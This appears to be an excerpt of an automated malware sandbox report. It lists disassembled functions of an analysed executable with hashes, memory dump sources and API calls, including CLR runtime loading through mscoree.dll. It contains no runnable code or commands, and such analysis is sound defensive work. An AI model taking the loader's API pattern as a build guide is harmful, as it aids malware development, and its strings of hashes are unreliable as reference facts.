Instruction Fuzzy Hash: EEF01276208205FAEB016A909D91A6D3228AB44755F348437B613790F1D57D8A52A62B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004022D5 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 01b96b65cfdcd90c1c397b9403299f682ee15a74256080b1f65cd8ec4d7bfb3c
Instruction ID: 21f26110e6cf775579a99558e1882726b209ec6e36350296178eddc2ef37f111
Opcode Fuzzy Hash: 01b96b65cfdcd90c1c397b9403299f682ee15a74256080b1f65cd8ec4d7bfb3c
Instruction Fuzzy Hash: 9D31227741825156DB1E9A708B8E3E77B27EA133103280077DD50BA6E2C1FD950792BF

Uniqueness

Uniqueness Score: -1.00%

Function 004022D3 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 469434ee880fbddea0cf341f8ebddacf8018562c28f181a85b7722323595557f
Instruction ID: 1b953951f9e84946fada76b5e7f37c1300e3b6096703083872e6ed5de9378dca
Opcode Fuzzy Hash: 469434ee880fbddea0cf341f8ebddacf8018562c28f181a85b7722323595557f
Instruction Fuzzy Hash: 7E21CB76804211A6DB1C99308B8E7AB7326E7527017680037DE217E6E6C1FD990353BF

Uniqueness

Uniqueness Score: -1.00%

Function 004022EA Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 815d57de8bd47a054c64f16f842a634469d2c4f05e2f076bc91d1185f8b74930
Instruction ID: a74d36b0f1b4ca646719bfef60322b7c2574aac90460d4f31a38f46cbe6a06f4
Opcode Fuzzy Hash: 815d57de8bd47a054c64f16f842a634469d2c4f05e2f076bc91d1185f8b74930
Instruction Fuzzy Hash: 2121B77680421196DB2C9A308B8D2AB6323F7523017280037CE217E6E6C1FD860353BF

Uniqueness

Uniqueness Score: -1.00%

Function 004022F1 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: bc449a23bfcb6e081e967bbb03bad2e5856122c8cad518a48a4c09eefedaf789
Instruction ID: 2ad66c17ff4b5c7641e1c3b577f1b688ffb2eaf70282a34240a13484d7da869d
Opcode Fuzzy Hash: bc449a23bfcb6e081e967bbb03bad2e5856122c8cad518a48a4c09eefedaf789
Instruction Fuzzy Hash: 9A21AD768142519ADB1D9A308B8E69F7327E6523053280037CE607E3E6C1FED60683BE

Uniqueness

Uniqueness Score: -1.00%

Function 00402312 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: ec9573f21acbeda1e5adbd331bdd9a66bfdfcae632fd8cf1d44ce58d08a21afe
Instruction ID: d5b1a2e7fd40de28ee2aa7102cdb0648d88445bae2b326fa8fa36a582353ce98
Opcode Fuzzy Hash: ec9573f21acbeda1e5adbd331bdd9a66bfdfcae632fd8cf1d44ce58d08a21afe
Instruction Fuzzy Hash: 8011AB7780021196DB1D9A30D78D29B7323E6523113280033CE207E6E6C1FE960683AD

Uniqueness

Uniqueness Score: -1.00%

Function 00402305 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

r, xrefs: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: d070691d41a4b8167cc98d0b2e0bbd4fe351c1b24e9e9887bc8c2df88032fe08
Instruction ID: 36f4b3429da6e91951d3646f31849f315e23384bd4bb7e62adf62cfe0857489e
Opcode Fuzzy Hash: d070691d41a4b8167cc98d0b2e0bbd4fe351c1b24e9e9887bc8c2df88032fe08
Instruction Fuzzy Hash: 5311A877800211AADB1D9A30D78E29B7323E6523113280037CE207E6E6C1FE9A0683AD

Uniqueness

Uniqueness Score: -1.00%

Function 004023C4 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd909946fa6d83afe3170f02bd51e94ebfabe704ff8a530d9576cfc491507cb2
Instruction ID: b9f03669d0f109e51e2338ecc83a7c25dad2aa5e152d193297df3b66b623484f
Opcode Fuzzy Hash: cd909946fa6d83afe3170f02bd51e94ebfabe704ff8a530d9576cfc491507cb2
Instruction Fuzzy Hash: 7F41819510A3D679EFC4B0357A865E357C0B553FAC7F07022C976191E3826CA513F217

Uniqueness

Uniqueness Score: -1.00%

Function 004023EE Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1313e89f3181827ef5095291014c0f5e08e7cfd477793f9acfe9d8cb8416de5d
Instruction ID: 09e50e7f80b6f240844a7b23185dac68934a4e24aadb5235ff5b6e5f6ae9bb98
Opcode Fuzzy Hash: 1313e89f3181827ef5095291014c0f5e08e7cfd477793f9acfe9d8cb8416de5d
Instruction Fuzzy Hash: CC316DA520A3D639FFC1B43479869E357C0A153FAC7F0B122C63A191B38219A513F207

Uniqueness

Uniqueness Score: -1.00%

Function 004023F6 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fec066df9cee890f92d44e47faef8400991d9858c5258831d13e6197af844a5
Instruction ID: 01a0968aa37eb0e973137a0db6cfce193636f6ce6e89c34c4a5cb268a5d0175f
Opcode Fuzzy Hash: 5fec066df9cee890f92d44e47faef8400991d9858c5258831d13e6197af844a5
Instruction Fuzzy Hash: 643169A920A3D639FFC0B43479829E357C0A453FAC7F0B112CA39191B38209A623F217

Uniqueness

Uniqueness Score: -1.00%

Function 00402408 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f8c0a5008f9db7fd65aa19be0258007aa11021050dc4b0505b05876cedb672
Instruction ID: c71be4eb22968519e14ba6c415b3182dc5cb403b38765c14a66933104140d499
Opcode Fuzzy Hash: b0f8c0a5008f9db7fd65aa19be0258007aa11021050dc4b0505b05876cedb672
Instruction Fuzzy Hash: 773148A520A3D639BFC5B43539829E347C0A053FAD3F0B112CA39191B38209A513F217

Uniqueness

Uniqueness Score: -1.00%

Function 004023CF Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dfe06143dd8cdd34f95c7aba1b32429ce6e8ba8df23d564ab2c18d4b26a116f
Instruction ID: 48886df60da1b2072515e8b2668d0c5560e49b5b5855dbf375e5abbc9cff86be
Opcode Fuzzy Hash: 9dfe06143dd8cdd34f95c7aba1b32429ce6e8ba8df23d564ab2c18d4b26a116f
Instruction Fuzzy Hash: 593104A524A3E639BFC1B43539869E357C0A457FAC3F0B112CA39191738209A613F217

Uniqueness

Uniqueness Score: -1.00%

Function 00402539 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25cce4130b94755a8767b001e81df3067063f7b74c3903dda5e075892b21874c
Instruction ID: 2e7c5a9e02c2513b2b6fcac27f0cbb353f6914b1e0455e18ebe1c9b1b3283f57
Opcode Fuzzy Hash: 25cce4130b94755a8767b001e81df3067063f7b74c3903dda5e075892b21874c
Instruction Fuzzy Hash: 9001FD1810B3A07EEED9AA7002580E767C0BE973547E03C7EC85767A82C916D943F309

Uniqueness

Uniqueness Score: -1.00%

Function 00401410 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39fa73a4d1676b38783984c63661d73ea57592dccbd6087f20195cc73c95959d
Instruction ID: 30867e0e19da27295cc2d55c1d093cdb6dcbbeeba6389614a884446845bf4642
Opcode Fuzzy Hash: 39fa73a4d1676b38783984c63661d73ea57592dccbd6087f20195cc73c95959d
Instruction Fuzzy Hash: E1B01205010C05C4A120150C23205D1810BB3C8B01DB0A70131A54B30B0908CE132001

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 907.exePID: 4284, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	3.1%
Signature Coverage:	1.3%
Total number of Nodes:	1438
Total number of Limit Nodes:	82

Executed Functions

Function 6F89B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6F89B73F
VariantInit.OLEAUT32(?), ref: 6F89B748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F89B7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89B7F5
VariantClear.OLEAUT32(?), ref: 6F89B801

Part of subcall function 6F89C850: VariantInit.OLEAUT32(?), ref: 6F89C88F
Part of subcall function 6F89C850: VariantInit.OLEAUT32(?), ref: 6F89C895
Part of subcall function 6F89C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F89C8A0
Part of subcall function 6F89C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F89C8D5
Part of subcall function 6F89C850: VariantClear.OLEAUT32(?), ref: 6F89C8E1

VariantClear.OLEAUT32(?), ref: 6F89BA15
SafeArrayDestroy.OLEAUT32(?), ref: 6F89BE90
VariantClear.OLEAUT32(?), ref: 6F89BEA3
VariantClear.OLEAUT32(?), ref: 6F89BEA9

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 375c541126f6a8077fccc804cc5f6269304f749a998865e92acfed5931b3276f
Instruction ID: 7e3728d74b48142c644fc2021d6da33629c09b1bfdb6c8af6fb918c0e8260d48
Opcode Fuzzy Hash: 375c541126f6a8077fccc804cc5f6269304f749a998865e92acfed5931b3276f
Instruction Fuzzy Hash: 50526C71D00218DFCB14DFA8C984BEEBBB5BF89314F14859AE519AB351DB30AA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F88B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,8E16AAE4), ref: 6F88B711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6F88B71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6F88B730
__cftoe.LIBCMT ref: 6F88B870
GetModuleHandleW.KERNEL32(?), ref: 6F88B88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6F88B8D7

Strings

v4.0.30319, xrefs: 6F88B767
mscoree.dll, xrefs: 6F88B70C, 6F88B717
CLRCreateInstance, xrefs: 6F88B72A

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: e1d80d7f94df94f5d62bf3438971e1092f7307bebec55176626ba444f2a797c1
Instruction ID: b4ec3691e68cc3a0866781c8316342f88923e9cb7386c422b259a14808df868f
Opcode Fuzzy Hash: e1d80d7f94df94f5d62bf3438971e1092f7307bebec55176626ba444f2a797c1
Instruction Fuzzy Hash: 71915C71D042899FDB04DFE8CC849AEBBB5FF89310F1089ADE125EB290D734A946CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0330BDC0 Relevance: 90.7, Strings: 72, Instructions: 688
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0330C55A
4'^q, xrefs: 0330BFE6
4'^q, xrefs: 0330C2C6
4'^q, xrefs: 0330C1F3
4'^q, xrefs: 0330C121
4'^q, xrefs: 0330C68E
4'^q, xrefs: 0330C0DB
4'^q, xrefs: 0330C0FE
4'^q, xrefs: 0330BF7D
4'^q, xrefs: 0330C009
4'^q, xrefs: 0330C4AA
4'^q, xrefs: 0330C89E
4'^q, xrefs: 0330BF14
4'^q, xrefs: 0330C18A
4'^q, xrefs: 0330C76A
4'^q, xrefs: 0330C4D6
4'^q, xrefs: 0330C7C2
4'^q, xrefs: 0330C02C
4'^q, xrefs: 0330C0B8
4'^q, xrefs: 0330C3CE
4'^q, xrefs: 0330C8F6
4'^q, xrefs: 0330C34A
4'^q, xrefs: 0330C3FA
4'^q, xrefs: 0330C8CA
4'^q, xrefs: 0330C426
4'^q, xrefs: 0330C072
4'^q, xrefs: 0330BDFC
4'^q, xrefs: 0330BEF1
4'^q, xrefs: 0330BDD9
4'^q, xrefs: 0330BE88
4'^q, xrefs: 0330C6E6
4'^q, xrefs: 0330C1D0
4'^q, xrefs: 0330BFC3
4'^q, xrefs: 0330C662
4'^q, xrefs: 0330C846
4'^q, xrefs: 0330C5DE
4'^q, xrefs: 0330C5B2
4'^q, xrefs: 0330C47E
4'^q, xrefs: 0330BF37
4'^q, xrefs: 0330C712
4'^q, xrefs: 0330C2F2
4'^q, xrefs: 0330C636
4'^q, xrefs: 0330C452
4'^q, xrefs: 0330C60A
4'^q, xrefs: 0330BECE
4'^q, xrefs: 0330C52E
4'^q, xrefs: 0330C3A2
4'^q, xrefs: 0330C1AD
4'^q, xrefs: 0330C216
4'^q, xrefs: 0330C376
4'^q, xrefs: 0330BE65
4'^q, xrefs: 0330C144
4'^q, xrefs: 0330C872
4'^q, xrefs: 0330C095
4'^q, xrefs: 0330BF5A
4'^q, xrefs: 0330C7EE
4'^q, xrefs: 0330C31E
4'^q, xrefs: 0330BE1F
4'^q, xrefs: 0330C81A
4'^q, xrefs: 0330BE42
4'^q, xrefs: 0330C167
4'^q, xrefs: 0330BFA0
4'^q, xrefs: 0330C796
4'^q, xrefs: 0330C04F
4'^q, xrefs: 0330C242
4'^q, xrefs: 0330BEAB
4'^q, xrefs: 0330C26E
4'^q, xrefs: 0330C586
4'^q, xrefs: 0330C6BA
4'^q, xrefs: 0330C29A
4'^q, xrefs: 0330C502
4'^q, xrefs: 0330C73E

Memory Dump Source

Source File: 00000006.00000002.1918651021.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3300000_907.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-1605395142
Opcode ID: e93c33140d1000c5b3b0b12804a79232af1efeeba3cb0b4fff8b8ac136d0c70e
Instruction ID: 95b852ae10dab5e708ba50b47872d9f417753630ec72d4740556ae891eacc1fb
Opcode Fuzzy Hash: e93c33140d1000c5b3b0b12804a79232af1efeeba3cb0b4fff8b8ac136d0c70e
Instruction Fuzzy Hash: 99720834E5120A9FDF08EF64E954A9DBBB1FF44700F1089AC9049AF265DF746D8A8F81

Uniqueness

Uniqueness Score: -1.00%

Function 6F899357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F8984BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F8984D2
SafeArrayGetElement.OLEAUT32 ref: 6F89850A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F8994C1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F8994D4
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F89950C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F8997A4
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F8997B7
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F8997F2

Part of subcall function 6F893A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F893B71
Part of subcall function 6F893A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F893B83

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F899D5F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F899D72
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F899DAF

Part of subcall function 6F893A90: SafeArrayDestroy.OLEAUT32(?), ref: 6F893BCF

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F89A1BC
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F89A1CF
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F89A20C
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Strings

A, xrefs: 6F89AD44

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: A
API String ID: 959723449-3554254475
Opcode ID: f54cc43a053733f4a5052fb353e29dae6cad08d206d6e2ef5c88e4e1ea7f62a7
Instruction ID: b64200cf905960434b0cad648ec23e33be853ace340b3a460642eb4d3c5ee932
Opcode Fuzzy Hash: f54cc43a053733f4a5052fb353e29dae6cad08d206d6e2ef5c88e4e1ea7f62a7
Instruction Fuzzy Hash: DB239F71A00304AFDB00DFACC984F9D77B9AF49308F1489D5EA19AF296DB35E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F892970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F8929F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F892A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F892A2F
VariantInit.OLEAUT32(?), ref: 6F892ABB
VariantInit.OLEAUT32(?), ref: 6F892B3F
VariantClear.OLEAUT32(?), ref: 6F892C04
VariantClear.OLEAUT32(?), ref: 6F892C0B
VariantClear.OLEAUT32(?), ref: 6F892C12
VariantClear.OLEAUT32(?), ref: 6F892C96
VariantClear.OLEAUT32(?), ref: 6F892C9D
VariantClear.OLEAUT32(?), ref: 6F892CD6
VariantClear.OLEAUT32(?), ref: 6F892CDD
VariantClear.OLEAUT32(?), ref: 6F892CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6F892D1B
VariantClear.OLEAUT32(?), ref: 6F892D45
VariantClear.OLEAUT32(?), ref: 6F892D4C
VariantClear.OLEAUT32(?), ref: 6F892D53

Memory Dump Source

